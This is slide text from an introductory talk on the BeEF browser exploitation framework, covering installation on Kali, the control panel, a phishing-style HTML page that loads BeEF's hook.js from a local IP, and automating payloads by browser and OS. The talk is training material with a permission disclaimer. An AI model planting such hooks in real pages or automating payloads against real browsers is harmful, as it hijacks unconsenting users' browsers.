Intro to BeEF Chad Hollman Analyst, County of Sacramento Department - - PowerPoint PPT Presentation

Intro to BeEF

Chad Hollman Analyst, County of Sacramento Department of Technology

What is BeEF? Installing BeEF Logging into BeEF Hooking your first browser Maintaining Persistence Automating BeEF

What is BeEF? Installing BeEF Logging into BeEF for the first time Hooking your first browser Maintaining Persistence Automating BeEF

What is BeEF?

BeEF is short for the Browser Exploitation Framework.

Disclaimer

I am no expert in BeEF

Disclaimer

Before using, make sure you have permission

What is BeEF? Installing BeEF Logging into BeEF Hooking your first browser Maintaining Persistence Automating BeEF

Install BeEF ruby > 2.5 ruby gems sqlite3

pre-reqs

Install BeEF apt update

update kali

Install BeEF apt install beef-xss -y

install beef

Install BeEF apt install libsqlite3-dev

install beef

Install BeEF gem install sqlite -v ‘1.4.2’

• -source ‘htts://rubygems.org/’

install beef

Install BeEF usr/shared/beef-xss$ bundle

install beef

Install BeEF vi /usr/share/beef-xss/config.yaml

update the default username and password

Install BeEF ./beef

then launch beef

Install BeEF

then launch beef

What is BeEF? Installing BeEF Logging into BeEF Hooking your first browser Maintaining Persistence Automating BeEF

Logging into BeEF

navigate to the ui/panel link in your browser

Logging into BeEF

Logging into BeEF

What is BeEF? Installing BeEF Logging into BeEF Hooking your first browser Maintaining Persistence Automating BeEF

Hooking your first browser

Hooking your first browser

<html> <head> <title>Fish</title> <script src=”http://192.168.1.51:3000/hook.js”></script> </head> <body> Banana </body> </html>

Hooking your first browser

Hooking your first browser

What is BeEF? Installing BeEF Logging into BeEF Hooking your first browser Maintaining Persistence Automating BeEF

Maintaining Persistence

What is BeEF? Installing BeEF Logging into BeEF Hooking your first browser Maintaining Persistence Automating BeEF

Automating BeEF

using the beef automated rule engine (are) you can run commands anytime a hooked browser becomes available

Automating BeEF

using the beef automated rule engine (are) you can run commands anytime a hooked browser becomes available so instead of waiting at the beef user interface, for a hooked browser to come online, you can write an automated rule to execute a number of commands instead

Automating BeEF

using the beef automated rule engine (are) you can run commands anytime a hooked browser becomes available so instead of waiting at the beef user interface, for a hooked browser to come online, you can write an automated rule to execute a number of commands instead rules can be based on information taken from when the hook is first created, ie only run when a firefox browser is launched and only execute firefox vulnerable payloads

Automating BeEF

using the beef automated rule engine (are) you can run commands anytime a hooked browser becomes available so instead of waiting at the beef user interface, for a hooked browser to come online, you can write an automated rule to execute a number of commands instead rules can be based on information taken from when the hook is first created, ie only run when a firefox browser is launched and only execute firefox vulnerable payloads rules can also be chained, so once one command is executed, another can be executed thereafter

Automating BeEF

configure delay target a specific operating system

[‘Linux’, ‘Windows’, ‘OSX’, ‘Android’, ‘iOS’, ‘Blackberry’, ‘ALL’]

target specific browsers

[‘FF’, ‘C’, ‘IE’, ‘O’, ‘ALL’]

provide matching options

[‘<’, ‘<=’, ‘==’, ‘>=’, ‘>’, ‘ALL’, ‘Vista’, ‘XP’]

multiple configs

configuring the automated rule engine

Demo

Thank you!

hollmanchad@gmail.com @gh0st